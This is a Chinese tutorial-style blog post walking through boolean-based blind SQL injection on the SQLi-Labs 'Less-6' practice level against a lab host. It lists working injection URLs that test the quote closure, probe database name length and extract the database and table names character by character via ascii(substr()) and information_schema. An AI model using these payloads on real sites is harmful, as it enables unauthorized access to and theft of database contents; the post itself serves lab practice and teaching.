当前位置: 首页 > news >正文

SQL 布尔盲注 (injection 第六关)

简介
   

        SQL注入(SQL Injection)是一种常见的网络攻击方式,通过向SQL查询中插入恶意的SQL代码,攻击者可以操控数据库,SQL注入是一种代码注入攻击,其中攻击者将恶意的SQL代码插入到应用程序的输入字段中,然后这些输入被传递到数据库服务器上执行。攻击者可以利用这一漏洞执行任意的SQL查询或命令,从而访问或操控数据库中的敏感信息。

       SQL注入的一个简要流程:

1、打开目标靶场

 2、选择less - 6

3、确定网站可以注入的参数

http://172.16.1.13/Less-6/?id= 

4、判断闭合方式   

 http://172.16.1.13/Less-6/?id=1" --+

5、确定数据库长度length()函数

因为页面只有ture和flase两种情况,所以需要使用布尔盲注判断数据库长度,使用length()函数

例如: http://172.16.1.13/Less-6/?id=1" and length(database())>6--+

http://172.16.1.13/Less-6/?id=1" and length(database())>8--+

最终可以确定数据库名长度为8

6、确定数据库字符使用ASCII码

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面显示正常 说明数据库第一位字符ascii码大于114

http://172.16.1.13/Less-6/?id=1" and ascii(substr(database(),1,1))>120--+

最终可以确定第一位字符ascii码为115,确定为字母s

以此类推,最终可确定数据库名为 security

7、查询数据库中第一张表

查询第一张表的第一个字符

http://172.16.1.13/Less-6/?id=1" and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

最终可以确定第一位字符ascii码为101,确定为字母e

按照此法依次可以得出最终自己想要的数据内容!!!

安全 

网络安全为人民,网络安全靠人民。

http://www.lryc.cn/news/428561.html

相关文章:

  • OpenAI 重回巅峰:ChatGPT-4O 最新模型超越谷歌 Gemini 1.5,多项测试夺冠!
  • 软件工程(2)面向对象方法:Booch方法与开发实例
  • 高阶面试-concurrentHashMap的整理
  • VSCode系列 - 如何用VSCode搭建C++高效开发环境(1)
  • 【人工智能】Python融合机器学习、深度学习和微服务的创新之路
  • Stability AI发布了单目视频转4D模型的新AI模型:Stable Video 4D
  • 网站如何被Google收录?
  • LearnOpenGL——法线贴图、视差贴图学习笔记
  • 界面优化 - 绘图
  • 死锁问题分析和解决——资源回收时
  • 【Java】效率工具模板的使用
  • c++指南 -指针和引用
  • [CISCN 2023 华北]ez_date
  • 前端不同项目使用不同的node版本(Volta管理切换)
  • Ropdump:针对二进制可执行文件的安全检测工具
  • Quartz - 定时任务框架集成
  • GoModule
  • SQL - 数据库管理
  • 密码学之AES算法
  • GitHub每日最火火火项目(8.20)
  • (五)Flink Sink 数据输出
  • Spring 注入、注解及相关概念补充
  • 【Linux多线程】线程安全的单例模式
  • 基于jqury和canvas画板技术五子棋游戏设计与实现(论文+源码)_kaic
  • 指针 (四)
  • 便利店(超市)管理系统设计与实现(源码+lw+部署文档+讲解等)
  • Excel中的“块”操作
  • yolo V8训练 长条状目标
  • 数据结构与算法 - 设计
  • 62 网络设备的暗藏的操控者SNMP